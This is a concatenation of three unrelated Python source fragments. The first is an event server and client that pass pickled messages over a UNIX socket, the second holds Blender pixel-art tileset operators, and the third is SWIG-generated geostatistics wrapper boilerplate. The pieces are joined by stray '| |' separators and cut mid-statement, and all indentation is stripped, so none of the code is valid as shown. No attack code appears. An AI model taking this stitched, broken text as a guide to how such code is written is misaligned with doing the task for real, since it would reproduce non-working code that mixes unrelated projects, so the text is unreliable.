"""Subscribes a queue to receive events.
Invoked only from the request handler.
"""
with self._lock:
self._queues.add(q)
def _unsubscribe(self, q):
"""Unsubscribes a queue to receive events.
Invoked only from the request handler.
"""
with self._lock:
self._queues.discard(q)
def _post_message(self, message):
"""Posts a message to all clients.
Invoked only from the request handler.
"""
try:
if logging.getLogger().isEnabledFor(logging.DEBUG):
logging.debug('Event server: dispatching object %s',
pickle.loads(message))
except Exception:
# Message isn't parseable as a pickled object; weird!
logging.info(
'Event server: dispatching message %r', message)
with self._lock:
for q in self._queues:
# Note that this is nonblocking (even if one of the
# clients is dead).
q.put(message)
class EventClientBase(metaclass=abc.ABCMeta):
"""A client used to post and receive messages from an event server.
All events sent through this class must be subclasses of Event. It
marshals Event classes through the server by pickling them.
The _process_event() need to be called periodically.
Inherit graph:
EventClientBase:
|-- ThreadingEventClient: A daemon thread to process events.
|-- BlockingEventClient: A while-loop on calling thread to process events.
"""
def __init__(self, path=None, callback=None):
"""Constructor.
Args:
path: The UNIX seqpacket socket endpoint path. If None, uses
the CROS_FACTORY_EVENT environment variable.
callback: A callback to call when events occur. The callback
takes one argument: the received event.
"""
self.socket = self._ConnectSocket(path)
self.callbacks = set()
logging.debug('Initializing event client')
if callback:
self.callbacks.add(callback)
self._lock = threading.Lock()
def close(self):
"""Closes the client."""
if self.socket:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
self.socket = None
def is_closed(self):
"""Return whether the client is closed."""
return self.socket is None
def _ConnectSocket(self, path):
s = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
path = path or os.environ[CROS_FACTORY_EVENT]
s.connect(path)
hello = s.recv(len(_HELLO_MESSAGE))
if hello != _HELLO_MESSAGE:
raise socket.error('Event client expected hello (%r) but got %r' %
_HELLO_MESSAGE, hello)
return s
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
# pylint: disable=redefined-outer-name
del exc_type, exc_value, traceback # Unused.
try:
self.close()
except Exception:
pass
return False
def _truncate_event_for_debug_log(self, event):
"""Truncates event to a size of _MAX_EVENT_SIZE_FOR_DEBUG_LOG.
Args:
event: The event to be printed.
Returns:
Truncated event string representation.
| |
obj.sprytile_gridid = curr_mat.grids[idx].id
bpy.ops.sprytile.build_grid_list()
class UTIL_OP_SprytileNewMaterial(bpy.types.Operator):
bl_idname = "sprytile.add_new_material"
bl_label = "New Shadeless Material"
bl_description = "Create a new shadeless material"
@classmethod
def poll(cls, context):
return context.object is not None
def invoke(self, context, event):
obj = context.object
if obj.type != 'MESH':
return {'FINISHED'}
mat = bpy.data.materials.new(name="Material")
set_idx = len(obj.material_slots)
bpy.ops.object.material_slot_add()
obj.active_material_index = set_idx
obj.material_slots[set_idx].material = mat
bpy.ops.sprytile.material_setup('INVOKE_DEFAULT')
bpy.ops.sprytile.validate_grids('INVOKE_DEFAULT')
bpy.data.materials.update()
return {'FINISHED'}
class UTIL_OP_SprytileSetupMaterial(bpy.types.Operator):
bl_idname = "sprytile.material_setup"
bl_label = "Set Material to Shadeless"
bl_description = "Make current selected material shadeless, for pixel art texture purposes"
@classmethod
def poll(cls, context):
return context.object is not None
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
obj = context.object
if obj.type != 'MESH' or len(obj.material_slots) == 0:
return {'FINISHED'}
mat = obj.material_slots[obj.active_material_index].material
# Make material equivalent to a shadeless transparent one in Blender 2.7
mat.use_nodes = True
mat.blend_method = 'CLIP'
# Get the material texture (if any) so we can keep it
mat_texture = get_material_texture(mat)
# Setup nodes
nodes = mat.node_tree.nodes
nodes.clear()
output_n = nodes.new(type = 'ShaderNodeOutputMaterial')
light_path_n = nodes.new(type = 'ShaderNodeLightPath')
transparent_n = nodes.new(type = 'ShaderNodeBsdfTransparent')
emission_n = nodes.new(type = 'ShaderNodeEmission')
mix_cam_ray_n = nodes.new(type = 'ShaderNodeMixShader')
mix_alpha_n = nodes.new(type = 'ShaderNodeMixShader')
texture_n = nodes.new(type = 'ShaderNodeTexImage')
# link
links = mat.node_tree.links
links.new(texture_n.outputs['Color'], emission_n.inputs['Color'])
links.new(texture_n.outputs['Alpha'], mix_alpha_n.inputs['Fac'])
links.new(transparent_n.outputs['BSDF'], mix_alpha_n.inputs[1])
links.new(transparent_n.outputs['BSDF'], mix_cam_ray_n.inputs[1])
links.new(emission_n.outputs['Emission'], mix_alpha_n.inputs[2])
links.new(mix_alpha_n.outputs['Shader'], mix_cam_ray_n.inputs[2])
links.new(light_path_n.outputs['Is Camera Ray'], mix_cam_ray_n.inputs['Fac'])
links.new(mix_cam_ray_n.outputs['Shader'], output_n.inputs['Surface'])
# reorder
output_n.location = (400, 0)
mix_cam_ray_n.location = (200, 0)
light_path_n.location = (0, 250)
mix_alpha_n.location = (0, -100)
transparent_n.location = (-200, -100)
emission_n.location = (-200, -200)
texture_n.location = (-500, 100)
if mat_texture:
texture_n.image = mat_texture
return {'FINISHED'}
class UTIL_OP_SprytileSetupViewport(bpy.types.Operator):
bl_idname = "sprytile.viewport_setup"
bl_label = "Setup Pixel Viewport"
bl_description = "Set optimal 3D viewport settings for pixel art"
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
# Disable Eevee's TAA, which causes noticeable artefacts with pixel art
context.scene.eevee.taa_samples = 1
context.scene.eevee.use_taa_reprojection = False
# Set view transform to standard, for correct texture brightness
context.scene.view_settings.view_transform = 'Standard'
# Reflect changes
context.scene.update_tag()
for area in context.screen.areas:
area.tag_redraw()
return {'FINISHED'}
class UTIL_OP_SprytileLoadTileset(bpy.types.Operator, ImportHelper):
bl_idname = "sprytile.tileset_load"
bl_label = "Load Tileset"
bl_description = "Load a tileset into the current material"
# For some reason this full list doesn't really work,
# reordered the list to prioritize common file types
# filter_ext = "*" + ";*".join(bpy.path.extensions_image.sort())
filter_glob: bpy.props.StringProperty(
default="*.bmp;*.psd;*.hdr;*.rgba;*.jpg;*.png;*.tiff;*.tga;*.jpeg;*.jp2;*.rgb;*.dds;*.exr;*.psb;*.j2c;*.dpx;*.tif;*.tx;*.cin;*.pdd;*.sgi",
options={'HIDDEN'},
)
def execute(self, context):
if context.object.type != 'MESH':
return {'FINISHED'}
# Check object material count, if 0 create a new material before loading
if len(context.object.material_slots.items()) < 1:
bpy.ops.sprytile.add_new_material('INVOKE_DEFAULT')
UTIL_OP_SprytileLoadTileset.load_tileset_file(context, self.filepath)
return {'FINISHED'}
@staticmethod
def load_tileset_file(context, filepath):
obj = context.object
texture_name = filepath[filepath.rindex(path.sep) + 1:]
material_name = filepath[filepath.rindex(path.sep) + 1: filepath.rindex('.')]
bpy.ops.sprytile.material_setup()
target_mat = obj.material_slots[obj.active_material_index].material
target_mat.name = material_name
loaded_img = bpy.data.images.load(filepath)
set_material_texture(target_mat, loaded_img)
bpy.ops.sprytile.texture_setup('INVOKE_DEFAULT')
bpy.ops.sprytile.validate_grids('INVOKE_DEFAULT')
bpy.data.textures.update()
class UTIL_OP_SprytileNewTileset(bpy.types.Operator, ImportHelper):
bl_idname = "sprytile.tileset_new"
bl_label = "Add Tileset"
bl_description = "Create a new material and load another tileset"
# For some reason this full list doesn't really work,
# reordered the list to prioritize common file types
# filter_ext = "*" + ";*".join(bpy.path.extensions_image.sort())
filter_glob: bpy.props.StringProperty(
default="*.bmp;*.psd;*.hdr;*.rgba;*.jpg;*.png;*.tiff;*.tga;*.jpeg;*.jp2;*.rgb;*.dds;*.exr;*.psb;*.j2c;*.dpx;*.tif;*.tx;*.cin;*.pdd;*.sgi",
options={'HIDDEN'},
)
def execute(self, context):
if context.object.type != 'MESH':
return {'FINISHED'}
bpy.ops.sprytile.add_new_material('INVOKE_DEFAULT')
UTIL_OP_SprytileLoadTileset.load_tileset_file(context, self.filepath)
return {'FINISHED'}
class UTIL_OP_SprytileSetupTexture(bpy.types.Operator):
bl_idname = "sprytile.texture_setup"
bl_label = "Setup Pixel Texture"
bl_description = "Change texture settings for crunchy pixelart style"
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
self.setup_tex(context)
return {'FINISHED'}
@staticmethod
def setup_tex(context):
""""""
obj = context.object
if obj.type != 'MESH':
return
material = obj.material_slots[obj.active_material_index].material
#target_texture = None
#target_img = None
#target_slot = None
# for texture_slot in material.texture_slots:
# if texture_slot is None:
# continue
# if texture_slot.texture is None:
# continue
# if texture_slot.texture.type == 'NONE':
# continue
# if texture_slot.texture.type == 'IMAGE':
# # Cannot use the texture slot image reference directly
# # Have to get it through bpy.data.images to be able to use with BGL
# target_texture = bpy.data.textures.get(texture_slot.texture.name)
# target_img = bpy.data.images.get(texture_slot.texture.image.name)
# target_slot = texture_slot
# break
# if target_texture is None or target_img is None:
# return
target_node = get_material_texture_node(material)
if not target_node:
return
target_node.interpolation = 'Closest'
target_img = target_node.image
# We don't have these in 2.8, but the behaviour with nodes and Closest filtering is equivalent.
# However, 2.8 doesn't currently offer an option to disable mipmaps?
# target_texture.use_preview_alpha = True
# target_texture.use_alpha = True
# target_texture.use_interpolation = False
# target_texture.use_mipmap = False
# target_texture.filter_type = 'BOX'
# target_texture.filter_size = 0.10
# target_slot.use_map_color_diffuse = True
# target_slot.use_map_alpha = True
# target_slot.alpha_factor = 1.0
# target_slot.diffuse_color_factor = 1.0
# target_slot.texture_coords = 'UV'
class UTIL_OP_SprytileValidateGridList(bpy.types.Operator):
bl_idname = "sprytile.validate_grids"
bl_label = "Validate Tile Grids"
bl_description = "Press if tile grids are not displaying properly"
@classmethod
def poll(cls, context):
return True
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
self.validate_grids(context)
return {'FINISHED'}
@staticmethod
def validate_grids(context):
mat_list = bpy.data.materials
mat_data_list = context.scene.sprytile_mats
# Validate the material IDs in scene.sprytile_mats
for check_mat_data in mat_data_list:
mat_idx = mat_list.find(check_mat_data.mat_id)
if mat_idx > -1:
continue
# This mat data id not found in materials
# Loop through materials looking for one
# that doesn't appear in sprytile_mats list
for check_mat in mat_list:
mat_unused = True
for mat_data in mat_data_list:
if mat_data.mat_id == check_mat.name:
mat_unused = False
break
if mat_unused:
target_mat_id = check_mat_data.mat_id
check_mat_data.mat_id = check_mat.name
for grid in check_mat_data.grids:
grid.mat_id = check_mat.name
for list_display in context.scene.sprytile_list.display:
if list_display.mat_id == target_mat_id:
list_display.mat_id = check_mat.name
break
remove_idx = []
# Filter out mat data with invalid IDs or users
for idx, mat in enumerate(mat_data_list.values()):
mat_idx = mat_list.find(mat.mat_id)
if mat_idx < 0:
remove_idx.append(idx)
continue
if (mat.mat_id == "Dots Stroke"):
remove_idx.append(idx)
continue
if mat_list[mat_idx].users == 0:
remove_idx.append(idx)
for grid in mat.grids:
grid.mat_id = mat.mat_id
remove_idx.reverse()
for idx in remove_idx:
mat_data_list.remove(idx)
# Loop through available materials, checking if mat_data_list has
# at least one entry for each material
for mat in mat_list:
if mat.users == 0:
continue
is_mat_valid = False
for mat_data in mat_data_list:
if mat_data.mat_id == mat.name:
is_mat_valid = True
break
if is_mat_valid is False and mat.name != "Dots Stroke":
mat_data_entry = mat_data_list.add()
mat_data_entry.mat_id = mat.name
mat_grid = mat_data_entry.grids.add()
mat_grid.mat_id = mat.name
mat_grid.id = get_highest_grid_id(context) + 1
context.object.sprytile_gridid = get_highest_grid_id(context)
bpy.ops.sprytile.build_grid_list()
class UTIL_OP_SprytileBuildGridList(bpy.types.Operator):
bl_idname = "sprytile.build_grid_list"
bl_label = "Sprytile Build Grid List"
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
self.build_list(context)
return {'FINISHED'}
@staticmethod
def build_list(context):
"""Build the scene.sprytile_list.display from scene.sprytile_mats"""
display_list = context.scene.sprytile_list.display
mat_list = context.scene.sprytile_mats
display_list.clear()
for mat_data in mat_list:
mat_display = display_list.add()
mat_display.mat_id = mat_data.mat_id
if mat_data.is_expanded is False:
continue
for mat_grid in mat_data.grids:
idx = len(display_list)
grid_display = display_list.add()
grid_display.grid_id = mat_grid.id
grid_display.parent_mat_name = mat_display.mat_name
grid_display.parent_mat_id = mat_display.mat_id
if context.object.sprytile_gridid == grid_display.grid_id:
context.scene.sprytile_list.idx = idx
class UTIL_OP_SprytileRotateLeft(bpy.types.Operator):
bl_idname = "sprytile.rotate_left"
bl_label = "Rotate Sprytile Left"
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
curr_rotation = context.scene.sprytile_data.mesh_rotate
curr_rotation += 1.5708
if curr_rotation > 6.28319:
curr_rotation = 0
context.scene.sprytile_data.mesh_rotate = curr_rotation
return {'FINISHED'}
class UTIL_OP_SprytileRotateRight(bpy.types.Operator):
bl_idname = "sprytile.rotate_right"
bl_label = "Rotate Sprytile Right"
def execute(self, context):
return self.invoke(context, None)
def invoke(self, context, event):
curr_rotation = context.scene.sprytile_data.mesh_rotate
curr_rotation -= 1.5708
if curr_rotation < -6.28319:
curr_rotation = 0
context.scene.sprytile_data.mesh_rotate = curr_rotation
return {'FINISHED'}
class UTIL_OP_SprytileReloadImages(bpy.types.Operator):
bl_idname = "sprytile.reload_imgs"
bl_label = "Reload All Images"
bl_description = "Automatically reload images referenced by the scene"
def invoke(self, context, event):
for img in bpy.data.images:
if img is None:
continue
img.reload()
for window in context.window_manager.windows:
for area in window.screen.areas:
if area.type in {'VIEW_3D', 'IMAGE_EDITOR'}:
area.tag_redraw()
return {'FINISHED'}
class UTIL_OP_SprytileReloadImagesAuto(bpy.types.Operator):
bl_idname = "sprytile.reload_auto"
bl_label = "Reload All Images (Auto)"
_timer = None
last_check_time = None
def modal(self, context, event):
if event.type == 'TIMER':
if context.scene.sprytile_data.auto_reload is False:
self.cancel(context)
return {'CANCELLED'}
if self.check_files():
for window in context.window_manager.windows:
for area in window.screen.areas:
if area.type in {'VIEW_3D', 'IMAGE_EDITOR'}:
area.tag_redraw()
return {'PASS_THROUGH'}
def check_files(self):
did_reload = False
for img in bpy.data.images:
if img is None:
continue
filepath = abspath(img.filepath)
if path.exists(filepath) is False:
continue
file_mod = path.getmtime(filepath)
filetime = datetime.fromtimestamp(file_mod)
if self.last_check_time is None or filetime > self.last_check_time:
print("Reloading", img.filepath)
img.reload()
did_reload = True
self.last_check_time = datetime.now()
return did_reload
def execute(self, context):
return self.invoke(context, | |
{}
__setattr__ = lambda self, name, value: _swig_setattr(self, mpds_geosClassicInput, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, mpds_geosClassicInput, name)
__repr__ = _swig_repr
__swig_setmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicInput_consoleAppFlag_set
__swig_getmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicInput_consoleAppFlag_get
if _newclass:
consoleAppFlag = _swig_property(_geosclassic.mpds_geosClassicInput_consoleAppFlag_get, _geosclassic.mpds_geosClassicInput_consoleAppFlag_set)
__swig_setmethods__["simName"] = _geosclassic.mpds_geosClassicInput_simName_set
__swig_getmethods__["simName"] = _geosclassic.mpds_geosClassicInput_simName_get
if _newclass:
simName = _swig_property(_geosclassic.mpds_geosClassicInput_simName_get, _geosclassic.mpds_geosClassicInput_simName_set)
__swig_setmethods__["simGrid"] = _geosclassic.mpds_geosClassicInput_simGrid_set
__swig_getmethods__["simGrid"] = _geosclassic.mpds_geosClassicInput_simGrid_get
if _newclass:
simGrid = _swig_property(_geosclassic.mpds_geosClassicInput_simGrid_get, _geosclassic.mpds_geosClassicInput_simGrid_set)
__swig_setmethods__["varName"] = _geosclassic.mpds_geosClassicInput_varName_set
__swig_getmethods__["varName"] = _geosclassic.mpds_geosClassicInput_varName_get
if _newclass:
varName = _swig_property(_geosclassic.mpds_geosClassicInput_varName_get, _geosclassic.mpds_geosClassicInput_varName_set)
__swig_setmethods__["formatString"] = _geosclassic.mpds_geosClassicInput_formatString_set
__swig_getmethods__["formatString"] = _geosclassic.mpds_geosClassicInput_formatString_get
if _newclass:
formatString = _swig_property(_geosclassic.mpds_geosClassicInput_formatString_get, _geosclassic.mpds_geosClassicInput_formatString_set)
__swig_setmethods__["outputMode"] = _geosclassic.mpds_geosClassicInput_outputMode_set
__swig_getmethods__["outputMode"] = _geosclassic.mpds_geosClassicInput_outputMode_get
if _newclass:
outputMode = _swig_property(_geosclassic.mpds_geosClassicInput_outputMode_get, _geosclassic.mpds_geosClassicInput_outputMode_set)
__swig_setmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicInput_outputImageFileName_set
__swig_getmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicInput_outputImageFileName_get
if _newclass:
outputImageFileName = _swig_property(_geosclassic.mpds_geosClassicInput_outputImageFileName_get, _geosclassic.mpds_geosClassicInput_outputImageFileName_set)
__swig_setmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicInput_outputReportFlag_set
__swig_getmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicInput_outputReportFlag_get
if _newclass:
outputReportFlag = _swig_property(_geosclassic.mpds_geosClassicInput_outputReportFlag_get, _geosclassic.mpds_geosClassicInput_outputReportFlag_set)
__swig_setmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicInput_outputReportFileName_set
__swig_getmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicInput_outputReportFileName_get
if _newclass:
outputReportFileName = _swig_property(_geosclassic.mpds_geosClassicInput_outputReportFileName_get, _geosclassic.mpds_geosClassicInput_outputReportFileName_set)
__swig_setmethods__["computationMode"] = _geosclassic.mpds_geosClassicInput_computationMode_set
__swig_getmethods__["computationMode"] = _geosclassic.mpds_geosClassicInput_computationMode_get
if _newclass:
computationMode = _swig_property(_geosclassic.mpds_geosClassicInput_computationMode_get, _geosclassic.mpds_geosClassicInput_computationMode_set)
__swig_setmethods__["covModel"] = _geosclassic.mpds_geosClassicInput_covModel_set
__swig_getmethods__["covModel"] = _geosclassic.mpds_geosClassicInput_covModel_get
if _newclass:
covModel = _swig_property(_geosclassic.mpds_geosClassicInput_covModel_get, _geosclassic.mpds_geosClassicInput_covModel_set)
__swig_setmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicInput_searchRadiusRelative_set
__swig_getmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicInput_searchRadiusRelative_get
if _newclass:
searchRadiusRelative = _swig_property(_geosclassic.mpds_geosClassicInput_searchRadiusRelative_get, _geosclassic.mpds_geosClassicInput_searchRadiusRelative_set)
__swig_setmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicInput_nneighborMax_set
__swig_getmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicInput_nneighborMax_get
if _newclass:
nneighborMax = _swig_property(_geosclassic.mpds_geosClassicInput_nneighborMax_get, _geosclassic.mpds_geosClassicInput_nneighborMax_set)
__swig_setmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_set
__swig_getmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_get
if _newclass:
searchNeighborhoodSortMode = _swig_property(_geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_get, _geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_set)
__swig_setmethods__["ndataImage"] = _geosclassic.mpds_geosClassicInput_ndataImage_set
__swig_getmethods__["ndataImage"] = _geosclassic.mpds_geosClassicInput_ndataImage_get
if _newclass:
ndataImage = _swig_property(_geosclassic.mpds_geosClassicInput_ndataImage_get, _geosclassic.mpds_geosClassicInput_ndataImage_set)
__swig_setmethods__["dataImage"] = _geosclassic.mpds_geosClassicInput_dataImage_set
__swig_getmethods__["dataImage"] = _geosclassic.mpds_geosClassicInput_dataImage_get
if _newclass:
dataImage = _swig_property(_geosclassic.mpds_geosClassicInput_dataImage_get, _geosclassic.mpds_geosClassicInput_dataImage_set)
__swig_setmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicInput_ndataPointSet_set
__swig_getmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicInput_ndataPointSet_get
if _newclass:
ndataPointSet = _swig_property(_geosclassic.mpds_geosClassicInput_ndataPointSet_get, _geosclassic.mpds_geosClassicInput_ndataPointSet_set)
__swig_setmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicInput_dataPointSet_set
__swig_getmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicInput_dataPointSet_get
if _newclass:
dataPointSet = _swig_property(_geosclassic.mpds_geosClassicInput_dataPointSet_get, _geosclassic.mpds_geosClassicInput_dataPointSet_set)
__swig_setmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicInput_maskImageFlag_set
__swig_getmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicInput_maskImageFlag_get
if _newclass:
maskImageFlag = _swig_property(_geosclassic.mpds_geosClassicInput_maskImageFlag_get, _geosclassic.mpds_geosClassicInput_maskImageFlag_set)
__swig_setmethods__["maskImage"] = _geosclassic.mpds_geosClassicInput_maskImage_set
__swig_getmethods__["maskImage"] = _geosclassic.mpds_geosClassicInput_maskImage_get
if _newclass:
maskImage = _swig_property(_geosclassic.mpds_geosClassicInput_maskImage_get, _geosclassic.mpds_geosClassicInput_maskImage_set)
__swig_setmethods__["meanUsage"] = _geosclassic.mpds_geosClassicInput_meanUsage_set
__swig_getmethods__["meanUsage"] = _geosclassic.mpds_geosClassicInput_meanUsage_get
if _newclass:
meanUsage = _swig_property(_geosclassic.mpds_geosClassicInput_meanUsage_get, _geosclassic.mpds_geosClassicInput_meanUsage_set)
__swig_setmethods__["meanValue"] = _geosclassic.mpds_geosClassicInput_meanValue_set
__swig_getmethods__["meanValue"] = _geosclassic.mpds_geosClassicInput_meanValue_get
if _newclass:
meanValue = _swig_property(_geosclassic.mpds_geosClassicInput_meanValue_get, _geosclassic.mpds_geosClassicInput_meanValue_set)
__swig_setmethods__["meanImage"] = _geosclassic.mpds_geosClassicInput_meanImage_set
__swig_getmethods__["meanImage"] = _geosclassic.mpds_geosClassicInput_meanImage_get
if _newclass:
meanImage = _swig_property(_geosclassic.mpds_geosClassicInput_meanImage_get, _geosclassic.mpds_geosClassicInput_meanImage_set)
__swig_setmethods__["varianceUsage"] = _geosclassic.mpds_geosClassicInput_varianceUsage_set
__swig_getmethods__["varianceUsage"] = _geosclassic.mpds_geosClassicInput_varianceUsage_get
if _newclass:
varianceUsage = _swig_property(_geosclassic.mpds_geosClassicInput_varianceUsage_get, _geosclassic.mpds_geosClassicInput_varianceUsage_set)
__swig_setmethods__["varianceValue"] = _geosclassic.mpds_geosClassicInput_varianceValue_set
__swig_getmethods__["varianceValue"] = _geosclassic.mpds_geosClassicInput_varianceValue_get
if _newclass:
varianceValue = _swig_property(_geosclassic.mpds_geosClassicInput_varianceValue_get, _geosclassic.mpds_geosClassicInput_varianceValue_set)
__swig_setmethods__["varianceImage"] = _geosclassic.mpds_geosClassicInput_varianceImage_set
__swig_getmethods__["varianceImage"] = _geosclassic.mpds_geosClassicInput_varianceImage_get
if _newclass:
varianceImage = _swig_property(_geosclassic.mpds_geosClassicInput_varianceImage_get, _geosclassic.mpds_geosClassicInput_varianceImage_set)
__swig_setmethods__["nGibbsSamplerPath"] = _geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_set
__swig_getmethods__["nGibbsSamplerPath"] = _geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_get
if _newclass:
nGibbsSamplerPath = _swig_property(_geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_get, _geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_set)
__swig_setmethods__["seed"] = _geosclassic.mpds_geosClassicInput_seed_set
__swig_getmethods__["seed"] = _geosclassic.mpds_geosClassicInput_seed_get
if _newclass:
seed = _swig_property(_geosclassic.mpds_geosClassicInput_seed_get, _geosclassic.mpds_geosClassicInput_seed_set)
__swig_setmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicInput_seedIncrement_set
__swig_getmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicInput_seedIncrement_get
if _newclass:
seedIncrement = _swig_property(_geosclassic.mpds_geosClassicInput_seedIncrement_get, _geosclassic.mpds_geosClassicInput_seedIncrement_set)
__swig_setmethods__["nrealization"] = _geosclassic.mpds_geosClassicInput_nrealization_set
__swig_getmethods__["nrealization"] = _geosclassic.mpds_geosClassicInput_nrealization_get
if _newclass:
nrealization = _swig_property(_geosclassic.mpds_geosClassicInput_nrealization_get, _geosclassic.mpds_geosClassicInput_nrealization_set)
def __init__(self):
this = _geosclassic.new_mpds_geosClassicInput()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _geosclassic.delete_mpds_geosClassicInput
__del__ = lambda self: None
mpds_geosClassicInput_swigregister = _geosclassic.mpds_geosClassicInput_swigregister
mpds_geosClassicInput_swigregister(mpds_geosClassicInput)
class mpds_geosClassicIndicatorInput(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, mpds_geosClassicIndicatorInput, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, mpds_geosClassicIndicatorInput, name)
__repr__ = _swig_repr
__swig_setmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_set
__swig_getmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_get
if _newclass:
consoleAppFlag = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_get, _geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_set)
__swig_setmethods__["simName"] = _geosclassic.mpds_geosClassicIndicatorInput_simName_set
__swig_getmethods__["simName"] = _geosclassic.mpds_geosClassicIndicatorInput_simName_get
if _newclass:
simName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_simName_get, _geosclassic.mpds_geosClassicIndicatorInput_simName_set)
__swig_setmethods__["simGrid"] = _geosclassic.mpds_geosClassicIndicatorInput_simGrid_set
__swig_getmethods__["simGrid"] = _geosclassic.mpds_geosClassicIndicatorInput_simGrid_get
if _newclass:
simGrid = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_simGrid_get, _geosclassic.mpds_geosClassicIndicatorInput_simGrid_set)
__swig_setmethods__["varName"] = _geosclassic.mpds_geosClassicIndicatorInput_varName_set
__swig_getmethods__["varName"] = _geosclassic.mpds_geosClassicIndicatorInput_varName_get
if _newclass:
varName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_varName_get, _geosclassic.mpds_geosClassicIndicatorInput_varName_set)
__swig_setmethods__["formatString"] = _geosclassic.mpds_geosClassicIndicatorInput_formatString_set
__swig_getmethods__["formatString"] = _geosclassic.mpds_geosClassicIndicatorInput_formatString_get
if _newclass:
formatString = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_formatString_get, _geosclassic.mpds_geosClassicIndicatorInput_formatString_set)
__swig_setmethods__["ncategory"] = _geosclassic.mpds_geosClassicIndicatorInput_ncategory_set
__swig_getmethods__["ncategory"] = _geosclassic.mpds_geosClassicIndicatorInput_ncategory_get
if _newclass:
ncategory = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_ncategory_get, _geosclassic.mpds_geosClassicIndicatorInput_ncategory_set)
__swig_setmethods__["categoryValue"] = _geosclassic.mpds_geosClassicIndicatorInput_categoryValue_set
__swig_getmethods__["categoryValue"] = _geosclassic.mpds_geosClassicIndicatorInput_categoryValue_get
if _newclass:
categoryValue = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_categoryValue_get, _geosclassic.mpds_geosClassicIndicatorInput_categoryValue_set)
__swig_setmethods__["outputMode"] = _geosclassic.mpds_geosClassicIndicatorInput_outputMode_set
__swig_getmethods__["outputMode"] = _geosclassic.mpds_geosClassicIndicatorInput_outputMode_get
if _newclass:
outputMode = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputMode_get, _geosclassic.mpds_geosClassicIndicatorInput_outputMode_set)
__swig_setmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_set
__swig_getmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_get
if _newclass:
outputImageFileName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_get, _geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_set)
__swig_setmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_set
__swig_getmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_get
if _newclass:
outputReportFlag = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_get, _geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_set)
__swig_setmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_set
__swig_getmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_get
if _newclass:
outputReportFileName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_get, _geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_set)
__swig_setmethods__["computationMode"] = _geosclassic.mpds_geosClassicIndicatorInput_computationMode_set
__swig_getmethods__["computationMode"] = _geosclassic.mpds_geosClassicIndicatorInput_computationMode_get
if _newclass:
computationMode = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_computationMode_get, _geosclassic.mpds_geosClassicIndicatorInput_computationMode_set)
__swig_setmethods__["covModel"] = _geosclassic.mpds_geosClassicIndicatorInput_covModel_set
__swig_getmethods__["covModel"] = _geosclassic.mpds_geosClassicIndicatorInput_covModel_get
if _newclass:
